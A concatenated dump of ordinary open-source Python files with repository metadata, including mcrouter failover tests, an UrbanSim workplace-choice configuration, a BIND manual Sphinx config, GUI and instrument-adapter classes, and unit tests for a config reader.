class TestGetFailoverWithFailoverTag(TestGetFailover):
config = './mcrouter/test/test_get_failover_with_failover_tag.json'
def test_get_failover(self):
key = 'testkey|#|extra=1'
self.failover_common(key)
# Verify the failover tag was appended
fail_key = key + ":failover=localhost@" + str(self.gut.getport())
self.assertEqual(self.mcr.get(key), 'bizbang-fail')
self.assertEqual(self.gut.get(fail_key), 'bizbang-fail')
class TestLeaseGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_lease_get_failover(self):
mcr = self.get_mcrouter()
get_res = {}
get_res['testkey'] = mcr.leaseGet('testkey')
get_res['testkey']['value'] = 'bizbang-lease'
self.assertGreater(get_res['testkey']['token'], 0)
self.assertTrue(mcr.leaseSet('testkey', get_res['testkey']))
get_res['testkey'] = mcr.leaseGet('testkey')
self.assertFalse(get_res['testkey']['token'])
self.assertEqual(get_res['testkey']['value'], 'bizbang-lease')
# kill the main host so everything failsover to mctestc00.gut
self.wildcard.terminate()
get_res['testkey'] = mcr.leaseGet('testkey')
get_res['testkey']['value'] = 'bizbang-lease-fail'
self.assertGreater(get_res['testkey']['token'], 0)
self.assertTrue(mcr.leaseSet('testkey', get_res['testkey']))
get_res['testkey'] = mcr.leaseGet('testkey')
self.assertFalse(get_res['testkey']['token'])
self.assertEqual(get_res['testkey']['value'], 'bizbang-lease-fail')
# the failover should have set it with a much shorter TTL
# so make sure that we can't get the value after the TTL
# has expired
time.sleep(4)
get_res['testkey'] = mcr.leaseGet('testkey')
self.assertGreater(get_res['testkey']['token'], 0)
self.assertFalse(get_res['testkey']['value'])
class TestMetaGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_metaget_failover(self):
mcr = self.get_mcrouter()
get_res = {}
self.assertTrue(mcr.set('testkey', 'bizbang'))
get_res = mcr.metaget('testkey')
self.assertEqual(0, int(get_res['exptime']))
self.wildcard.terminate()
self.assertTrue(mcr.set('testkey', 'bizbang-fail'))
self.assertEqual(mcr.get('testkey'), 'bizbang-fail')
get_res = mcr.metaget('testkey')
self.assertAlmostEqual(int(get_res['exptime']),
int(time.time()) + 3,
delta=1)
# the failover should have set it with a much shorter TTL
# so make sure that we can't get the value after the TTL
# has expired
time.sleep(4)
self.assertEqual(mcr.metaget('testkey'), {})
self.assertEqual(mcr.get('testkey'), None)
|
tempbottle/mcrouter
|
mcrouter/test/test_mcrouter.py
|
Python
|
bsd-3-clause
| 13,301
| 0.001579
|
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.configs.base_configuration import AbstractUrbansimConfiguration
from opus_core.resources import merge_resources_if_not_None
import copy
"""this configuration file specifying workplace choice models:
home_based_workplace_choice_model, workplace_choice_model_for_residents,
workplace_choice_model_for_immigrants, and
simple models keeping consistency between persons and households/jobs.
Home base choice model is defined in urbansim.configs.general_configuration_with_changed_elcm
"""
config = AbstractUrbansimConfiguration()
run_configuration = config.copy()
wlcm_model_configuration = {
"estimation":"opus_core.bhhh_mnl_estimation",
"sampler":"opus_core.samplers.weighted_sampler",
"sample_size_locations":30,
"weights_for_estimation_string":"urbansim.zone.number_of_non_home_based_jobs",
"compute_capacity_flag":True,
"capacity_string":"urbansim.zone.number_of_non_home_based_jobs",
"number_of_units_string":"urbansim.zone.number_of_non_home_based_jobs",
}
run_configuration['models_configuration']['workplace_choice_model_for_resident']= wlcm_model_configuration
my_controller_configuration = {
'household_person_consistency_keeper':{
"import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
"init": {
"name": "PersonDatasetConsistencyKeeperModel",
"arguments": {},
},
"run": {
"arguments": {"household_set": "household",
"person_set":"person",
"expand_person_set":True,
}
},
},
# This isn't necessary since we don't explicitly match person to job, but number of jobs and persons should match at zone level
# 'job_person_consistency_keeper':{
# "import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
# "init": {
# "name": "PersonDatasetConsistencyKeeperModel",
# "arguments": {},
# },
# "run": {
# "arguments": {"job_set": "job",
# "person_set":"person",
# "expand_person_set":False,
# }
# },
# },
'workplace_choice_model_for_resident': {
"import": {"urbansim.models.agent_location_choice_model":"AgentLocationChoiceModel"},
"init": {
"name": "AgentLocationChoiceModel",
"arguments": {
"location_set":"zone",
"model_name":"'Non-home-based Workplace Choice Model for residents'",
"short_name":"'NHBWCM'",
"choices":"'urbansim.lottery_choices'",
"submodel_string":"'psrc.person.household_income'",
# "filter": "'psrc.job.is_untaken_non_home_based_job'",
"location_id_string":"'psrc.person.zone_id'",#"'psrc.person.workplace_zone_id'",
"run_config":"models_configuration['workplace_choice_model_for_resident']",
"estimate_config":"models_configuration['workplace_choice_model_for_resident']"
}},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"specification_storage": "base_cache_storage", #"models_configuration['specification_storage']",
"specification_table": "'workplace_choice_model_for_resident_specification'",
"coefficients_storage": "base_cache_storage", #"models_configuration['coefficients_storage']",
"coefficients_table": "'workplace_choice_model_for_resident_coefficients'",
},
"output": "(specification, coefficients)"
},
"run": {
"arguments": {"specification": "specification",
"coefficients":"coefficients",
"agent_set": "person",
"agents_index": None,
"agents_filter":"'psrc.person.is_non_home_based_worker_without_workplace_zone'",
"data_objects": "datasets",
"chunk_specification":"{'records_per_chunk':5000}",
"debuglevel": run_configuration['debuglevel'] }
},
"prepare_for_estimate": {
"name": "prepare_for_estimate",
"arguments": {
"agent_set":"person",
"join_datasets": "False",
"agents_for_estimation_storage": "base_cache_storage",
"agents_for_estimation_table": "'workers_for_estimation'",
"filter":None,
"data_objects": "datasets"
},
"output": "(specification, index)"
},
"estimate": {
"arguments": {
"specification": "specification",
"agent_set": "person",
"agents_index": "index",
"data_objects": "datasets",
"debuglevel": run_configuration['debuglevel']},
"output": "(coefficients, dummy)"
},
},
"job_change_model":{
"import": {"urbansim.models.agent_relocation_model":
"AgentRelocationModel"
},
"init": {
"name": "AgentRelocationModel",
"arguments": {"choices":"opus_core.random_choices",
"probabilities":"psrc.job_change_probabilities",
"location_id_name":"'psrc.person.workplace_zone_id'",
"model_name":"job change model",
"debuglevel": config['debuglevel']
},
},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"what": "'person'", "rate_storage": "base_cache_storage",
"rate_table": "'annual_job_change_rates_for_workers'"},
"output": "jcm_resources"
},
"run": {
"arguments": {"agent_set": "person", "resources": "jcm_resources"},
"output": "jcm_index"
}
}
}
my_controller_configuration["workplace_choice_model_for_immigrant"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["workplace_choice_model_for_immigrant"]["init"]["arguments"]["model_name"] = "'Non-home-based Workplace Choice Model for immigrants'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["specification_table"] = "'workplace_choice_model_for_immigrant_specification'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'workplace_choice_model_for_immigrant_coefficients'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_immigrant_worker_without_workplace_zone'"
my_controller_configuration["home_based_workplace_choice_model"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["filter"] = "'psrc.job.is_untaken_home_based_job'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["specification_table"] = "'home_based_workplace_choice_model_specification'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'home_based_workplace_choice_model_coefficients'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_home_based_worker_without_job'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["chunk_specification"] = "{'nchunks':1}"
my_controller_configuration["worker_specific_household_location_choice_model"] = copy.deepcopy(run_configuration['models_configuration']["household_location_choice_model"]["controller"])
my_controller_configuration["worker_specific_household_location_choice_model"]["init"]["arguments"]["submodel_string"] = "'psrc.household.nonhome_based_workers_category'"
#my_controller_configuration["worker_specific_household_location_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
#my_controller_configuration["worker_specific_household_location_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["worker_specific_household_location_choice_model"]["prepare_for_run"]["arguments"]["specification_table"] = "'worker_specific_household_choice_model_specification'"
my_controller_configuration["worker_specific_household_location_choice_model"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'worker_specific_household_choice_model_coefficients'"
for model in my_controller_configuration.keys():
if model not in run_configuration["models_configuration"].keys():
run_configuration["models_configuration"][model] = {}
run_configuration["models_configuration"][model]['controller'] = my_controller_configuration[model]
run_configuration['creating_baseyear_cache_configuration'].tables_to_cache += [
"persons",
"workers_for_estimation",
"home_based_choice_model_coefficients",
"home_based_choice_model_specification",
"home_based_workplace_choice_model_coefficients",
"home_based_workplace_choice_model_specification",
"workplace_choice_model_for_resident_specification",
"workplace_choice_model_for_resident_coefficients",
"workplace_choice_model_for_immigrant_specification",
"workplace_choice_model_for_immigrant_coefficients",
]
run_configuration["datasets_to_preload"]['person'] = {'package_name':'psrc'}
run_configuration["models"] = [
# "prescheduled_events",
# "events_coordinator",
# "residential_land_share_model",
# 'land_price_model',
# 'development_project_transition_model',
# 'residential_development_project_location_choice_model',
# 'commercial_development_project_location_choice_model',
# 'industrial_development_project_location_choice_model',
# "development_event_transition_model",
# "events_coordinator",
# "residential_land_share_model",
# "household_transition_model",
# "employment_transition_model",
# "household_relocation_model",
# "household_location_choice_model",
# "employment_relocation_model",
# {"employment_location_choice_model": {"group_members": "_all_"}},
# "distribute_unplaced_jobs_model"
"prescheduled_events",
"events_coordinator",
"residential_land_share_model",
'land_price_model',
'development_project_transition_model',
'residential_development_project_location_choice_model',
'commercial_development_project_location_choice_model',
'industrial_development_project_location_choice_model',
"development_event_transition_model",
"events_coordinator",
"residential_land_share_model",
"household_transition_model",
"employment_transition_model",
"household_person_consistency_keeper",
"home_based_choice_model",
"home_based_workplace_choice_model",
"job_change_model",
"workplace_choice_model_for_immigrant",
"job_person_consistency_keeper",
"household_relocation_model",
"household_location_choice_model",
"workplace_choice_model_for_resident",
"employment_relocation_model",
{"employment_location_choice_model": {"group_members": "_all_"}},
"distribute_unplaced_jobs_model"
]
|
christianurich/VIBe2UrbanSim
|
3rdparty/opus/src/psrc/config/workplace_zone_choice_model_config.py
|
Python
|
gpl-2.0
| 13,587
| 0.011261
|
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################
# flake8: noqa: E501
from typing import List, Tuple
from docutils import nodes
from docutils.nodes import Node, system_message
from docutils.parsers.rst import roles
from sphinx import addnodes
from sphinx.util.docutils import ReferenceRole
GITLAB_BASE_URL = 'https://gitlab.isc.org/isc-projects/bind9/-/'
# Custom Sphinx role enabling automatic hyperlinking to GitLab issues/MRs.
class GitLabRefRole(ReferenceRole):
def __init__(self, base_url: str) -> None:
self.base_url = base_url
super().__init__()
def run(self) -> Tuple[List[Node], List[system_message]]:
gl_identifier = '[GL %s]' % self.target
target_id = 'index-%s' % self.env.new_serialno('index')
entries = [('single', 'GitLab; ' + gl_identifier, target_id, '', None)]
index = addnodes.index(entries=entries)
target = nodes.target('', '', ids=[target_id])
self.inliner.document.note_explicit_target(target)
try:
refuri = self.build_uri()
reference = nodes.reference('', '', internal=False, refuri=refuri,
classes=['gl'])
if self.has_explicit_title:
reference += nodes.strong(self.title, self.title)
else:
reference += nodes.strong(gl_identifier, gl_identifier)
except ValueError:
error_text = 'invalid GitLab identifier %s' % self.target
msg = self.inliner.reporter.error(error_text, line=self.lineno)
prb = self.inliner.problematic(self.rawtext, self.rawtext, msg)
return [prb], [msg]
return [index, target, reference], []
def build_uri(self):
if self.target[0] == '#':
return self.base_url + 'issues/%d' % int(self.target[1:])
if self.target[0] == '!':
return self.base_url + 'merge_requests/%d' % int(self.target[1:])
raise ValueError
def setup(_):
roles.register_local_role('gl', GitLabRefRole(GITLAB_BASE_URL))
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'BIND 9 管理员参考手册'
copyright = u'2021, Internet Systems Consortium'
author = u"Internet Systems Consortium \\and 翻译: sunguonian@yahoo.com"
# The full version, including alpha/beta/rc tags
release = 'BIND 9.16.18(稳定版)'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'*.grammar.rst',
'*.zoneopts.rst',
'catz.rst',
'dlz.rst',
'dnssec.rst',
'dyndb.rst',
'logging-cattegories.rst',
'managed-keys.rst',
'pkcs11.rst',
'plugins.rst'
]
# The master toctree document.
master_doc = 'index'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#html_theme = 'alabaster'
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
latex_engine = 'xelatex'
latex_elements = {
'fontpkg': r'''
\setmainfont{Source Han Serif CN:style=Regular}
\setsansfont{Source Han Sans CN Medium:style=Medium,Regular}
\setmonofont{Source Han Sans CN:style=Regular}
\setCJKfamilyfont{song}{Source Han Serif CN:style=Regular}
\setCJKfamilyfont{heiti}{Source Han Sans CN:style=Regular}
''',
'pointsize': '11pt',
'preamble': r'\input{../mystyle.tex.txt}'
}
latex_documents = [
(master_doc, 'Bv9ARM.tex', u'BIND 9管理员参考手册', author, 'manual'),
]
latex_logo = "isc-logo.pdf"
|
perlang/bv9arm-chinese
|
branches/9.16.18/arm/conf.py
|
Python
|
mpl-2.0
| 5,717
| 0.000352
|
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
from RGT.XML.SVG.Attribs.conditionalProcessingAttributes import ConditionalProcessingAttributes
from RGT.XML.SVG.Attribs.xlinkAttributes import XlinkAttributes
from RGT.XML.SVG.Attribs.animationTimingAttributes import AnimationTimingAttributes
class BaseAnimationNode(BasicSvgNode):
ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED = 'externalResourcesRequired'
def __init__(self, ownerDoc, tagName):
BasicSvgNode.__init__(self, ownerDoc, tagName)
ConditionalProcessingAttributes.__init__(self)
XlinkAttributes.__init__(self)
AnimationTimingAttributes.__init__(self)
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS)
def setExternalResourcesRequired(self, data):
allowedValues = ['true', 'false']
if data is not None:
if data not in allowedValues:
values = ''
for value in allowedValues:
values += value + ', '
values = values[0: len(values) - 2]
raise ValueError('Value not allowed, only ' + values + 'are allowed')
else:
self._setNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED, data)
def getExternalResourcesRequired(self):
node = self._getNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED)
if node is not None:
return node.nodeValue
return None
|
danrg/RGT-tool
|
src/RGT/XML/SVG/Animation/baseAnimationNode.py
|
Python
|
mit
| 1,499
| 0.004003
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 11:34:27 2015
@author: JonasAdler
"""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
# External
import numpy as np
# Internal
import odl
from tomography_helper import ForwardProjector
def SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, iterations=1, N=1):
""" Reconstruct with split Bregman.
Parameters
----------
A : `odl.Operator`
Pojector
Phi : `odl.Operator`
Sparsifying transform
x : ``A.domain`` element
"""
Atf = A.adjoint(rhs)
b = Phi.range.zero()
d = Phi.range.zero()
op = mu * (A.adjoint * A) + la * (Phi.adjoint * Phi)
fig = None
for i in range(iterations):
for n in range(N):
# Solve tomography part iteratively
rhs = mu * Atf + la * Phi.adjoint(d-b)
odl.solvers.conjugate_gradient(op, x, rhs, niter=2)
# d = sign(Phi(x)+b) * max(|Phi(x)+b|-la^-1,0)
s = Phi(x) + b
d = s.ufunc.sign() * (s.ufunc.absolute().
ufunc.add(-1.0/la).
ufunc.maximum(0.0))
b = b + Phi(x) - d
fig = x.show(clim=[0.0, 1.1], fig=fig, show=True)
n = 100
# Create spaces
d = odl.uniform_discr([0, 0], [1, 1], [n, n])
ran = odl.uniform_discr([0, 0], [1, np.pi], [np.ceil(np.sqrt(2) * n), n])
# Create phantom
phantom = odl.util.shepp_logan(d, modified=True)
# These are tuing parameters in the algorithm
la = 500. / n # Relaxation
mu = 20000. / n # Data fidelity
# Create projector
Phi = odl.trafos.WaveletTransform(d, nscales=3, wbasis='db2', mode='per')
A = ForwardProjector(d, ran)
# Create data
rhs = A(phantom)
# Add noise
rhs.ufunc.add(np.random.rand(ran.size)*0.05, out=rhs)
# Reconstruct
x = d.zero()
#odl.solvers.conjugate_gradient_normal(A, x, rhs, niter=7)
SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, 100, 1)
x.show()
|
odlgroup/odl-examples
|
tomography_wavelet_split_bregman.py
|
Python
|
gpl-3.0
| 2,070
| 0.002415
|
import re
class CommandError(Exception):
pass
class BaseCommand():
"""
Base command, this will accept and handle some generic features of all commands.
Like error handling, argument retrieving / checking
"""
def __init__(self, args):
"""
Initialize the class
"""
self._args = args
def arg(self, key):
"""
Retrieve a single argument
"""
return self._args.get(key)
def args(self, *keys):
"""
Retrieve a set of argument
"""
if keys:
return [self.arg(k) for k in keys]
else:
return self._args
def value(self, key):
"""
Retrieve a single argument
"""
key = '<{0}>'.format(key)
return self.arg(key)
def option(self, key, value=None):
"""
Retrieve a single argument
"""
key = '--'+key
if value:
return self.arg(key) == value
return self.arg(key)
def args_context(self):
"""
Convert all options and values into a context usable by the template parser
"""
context = dict(options={}, values={})
for key, value in self.args().items():
expressions = {
'options': r'--(.*)',
'values': r'<(.*)>',
}
for group, expression in expressions.items():
matches = re.search(expression, key)
if matches:
context[matches.group(1).replace('-', '_')] = value
return context
|
snelis/snelis
|
snelis/management/commands/__init__.py
|
Python
|
bsd-3-clause
| 1,601
| 0.001874
|
"""
Configuration for a project.
"""
rails = {
'models.engine': 'sqlalchemy',
'models.db.type': 'postgres',
'models.db.user': 'rails',
'models.db.password': 'rails',
'views.engine': 'jinja',
}
|
PythonRails/examples
|
blog/config.py
|
Python
|
mit
| 218
| 0
|
import sys
from contextlib import contextmanager
from StringIO import StringIO
@contextmanager
def string_stdout():
output = StringIO()
sys.stdout = output
yield output
sys.stdout = sys.__stdout__
|
jklaiho/django-class-fixtures
|
class_fixtures/utils/__init__.py
|
Python
|
bsd-3-clause
| 214
| 0.004673
|
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.config import ConfigReader, ConfigFileReadError
import unittest
class TestConfigReader(unittest.TestCase):
def test_get_returns_string_config_value(self):
'''
Test config value returned is expected value
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("string_test")
self.assertEqual(value, "some value", "Value did not match expected.")
def test_get_with_default_value(self):
"Test the get method returns value if available or the the default."
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("some value", config.get("string_test", "default value"))
self.assertEqual("default value", config.get("i_dont_exist", "default value"))
def test_get_handles_namespaced_keys(self):
'''
Test ConfigReader works with namespaced keys like, path.to.element
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("bill-to.given")
self.assertEqual(value, "Chris", "Value did not match expected.")
def test_get_handles_yaml_arrays(self):
'''
Test ConfigReader works with YAML arrays.
'''
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("dogs", config.get("list_test")[0])
self.assertEqual("cats", config.get("list_test")[1])
self.assertEqual("badgers", config.get("list_test")[2])
def test_get_with_cascaded_config_files(self):
'''
Test Config reader loaded up with multiple configs loads
the config preferences in order.
'''
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertEqual("hello", config.get("setting_from_config1"))
# this will take the config from config2, which has precedence.
self.assertEqual("beautiful", config.get("overwrite_setting"))
# this will take the setting form config2.
self.assertEqual("hi", config.get("setting_from_config2"))
def test_get_with_missing_key_and_no_default(self):
"An error should be thrown if the key is missing and no default provided."
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertRaises(KeyError, config.get, "setting_that_doesnt_exist")
def test_specifying_bad_config_file(self):
"Test error is thrown when invalid config file is specified."
self.assertRaises(ConfigFileReadError, ConfigReader, "tests/TestConfig1,NOSUCHFILE")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
LeXuZZ/localway_tests
|
wtframework/wtf/tests/test_config_reader.py
|
Python
|
gpl-3.0
| 3,596
| 0.003337
|
# -*- coding: utf-8 -*-
import os.path
import wx
from outwiker.core.system import getImagesDir
class SearchReplacePanel (wx.Panel):
def __init__(self, parent):
super(SearchReplacePanel, self).__init__(
parent,
style=wx.TAB_TRAVERSAL | wx.RAISED_BORDER)
self._controller = None
self._createGui()
self._bindEvents()
# Список элементов, относящихся к замене
self._replaceGui = [self._replaceLabel,
self._replaceText,
self._replaceBtn,
self._replaceAllBtn,
]
self.setReplaceGuiVisible(False)
def setController(self, controller):
self._controller = controller
@property
def searchTextCtrl(self):
return self._searchText
@property
def replaceTextCtrl(self):
return self._replaceText
@property
def resultLabel(self):
return self._resultLabel
def setReplaceGuiVisible(self, visible):
"""
Установить, нужно ли показывать элементы GUI для замены
"""
for item in self._replaceGui:
item.Show(visible)
self.Layout()
def _bindEvents(self):
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._searchText)
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._replaceText)
self.Bind(wx.EVT_TEXT, self.__onSearchTextChange, self._searchText)
self.Bind(wx.EVT_BUTTON, self.__onNextSearch, self._nextSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onPrevSearch, self._prevSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplace, self._replaceBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplaceAll, self._replaceAllBtn)
self.Bind(wx.EVT_BUTTON, self.__onCloseClick, self._closeBtn)
for child in self.GetChildren():
child.Bind(wx.EVT_KEY_DOWN, self.__onKeyPressed)
def _createGui(self):
# Поле для ввода искомой фразы
self._searchText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
# Текст для замены
self._replaceText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
# Элементы интерфейса, связанные с поиском
self._findLabel = wx.StaticText(self, -1, _(u"Find what: "))
# Кнопка "Найти далее"
self._nextSearchBtn = wx.Button(self, -1, _(u"Next"))
# Кнопка "Найти выше"
self._prevSearchBtn = wx.Button(self, -1, _(u"Prev"))
# Метка с результатом поиска
self._resultLabel = wx.StaticText(self, -1, "")
self._resultLabel.SetMinSize((150, -1))
# Элементы интерфейса, связанные с заменой
self._replaceLabel = wx.StaticText(self, -1, _(u"Replace with: "))
# Кнопка "Заменить"
self._replaceBtn = wx.Button(self, -1, _(u"Replace"))
# Кнопка "Заменить все"
self._replaceAllBtn = wx.Button(self, -1, _(u"Replace All"))
self._closeBtn = wx.BitmapButton(
self,
-1,
wx.Bitmap(os.path.join(getImagesDir(), "close-button.png"),
wx.BITMAP_TYPE_ANY))
self._layout()
def _layout(self):
self._mainSizer = wx.FlexGridSizer(cols=6)
self._mainSizer.AddGrowableCol(1)
# Элементы интерфейса для поиска
self._mainSizer.Add(self._findLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._searchText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._nextSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._prevSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._closeBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=1)
self._mainSizer.Add(self._resultLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
# Элементы интерфейса для замены
self._mainSizer.Add(self._replaceLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._replaceAllBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
# self._mainSizer.AddStretchSpacer()
# self._mainSizer.AddStretchSpacer()
self.SetSizer(self._mainSizer)
self.Layout()
def __onNextSearch(self, event):
if self._controller is not None:
self._controller.nextSearch()
def __onPrevSearch(self, event):
if self._controller is not None:
self._controller.prevSearch()
def __onReplace(self, event):
if self._controller is not None:
self._controller.replace()
def __onReplaceAll(self, event):
if self._controller is not None:
self._controller.replaceAll()
def __onSearchTextChange(self, event):
if self._controller is not None:
self._controller.enterSearchPhrase()
def __onKeyPressed(self, event):
key = event.GetKeyCode()
if key == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def __onEnterPress(self, event):
if self._controller is None:
return
if self._replaceText.IsShown():
self._controller.replace()
else:
self._controller.nextSearch()
def __onCloseClick(self, event):
self.Close()
|
unreal666/outwiker
|
src/outwiker/gui/searchreplacepanel.py
|
Python
|
gpl-3.0
| 6,309
| 0
|
"""
Contains methods for working with the Lakeshore 475 Gaussmeter
"""
from quantities import Quantity
from typing import Optional
from instruments.lakeshore import Lakeshore475 as _Lakeshore475
from time import sleep
class Lakeshore475(object):
"""
Adapter layer for IK's Lakeshore 475 implementation
"""
_port = '/dev/ttyUSB0'
_address = 12
_managed_instance = None
_constructor = _Lakeshore475
@property
def port_name(self) -> str:
"""
:return: The port to which this magnetometer will be attached
"""
return self._port
@port_name.setter
def port_name(self, new_port_name: str) -> None:
"""
:param new_port_name: The new port
:return:
"""
self._port = new_port_name
@property
def address(self) -> int:
"""
:return: The address
"""
return self._address
@address.setter
def address(self, new_address: int) -> None:
"""
:param new_address: The desired address
:return:
"""
self._address = new_address
@property
def _magnetometer(self) -> Optional[_Lakeshore475]:
"""
:return: The instance of the magnetometer that this adapter manages, or
None if there is no instance.
.. note::
The 1 second delay is required for the gaussmeter to reset
itself and accept commands
"""
if self._managed_instance is None:
self._managed_instance = self._constructor.open_gpibusb(
port=self.port_name, gpib_address=self.address)
sleep(1)
return self._managed_instance
@property
def field(self) -> Quantity:
"""
:return: The measured magnetic field from the Gaussmeter
"""
try:
return self._magnetometer.field
except ValueError:
return -100000.0 * self._magnetometer.field_units # type:
# Quantity
|
MichalKononenko/MrFreeze
|
mr_freeze/devices/lakeshore_475.py
|
Python
|
agpl-3.0
| 2,013
| 0.000497
|
../../../../../../../share/pyshared/orca/scripts/apps/packagemanager/script_settings.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/scripts/apps/packagemanager/script_settings.py
|
Python
|
gpl-3.0
| 87
| 0.022989
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
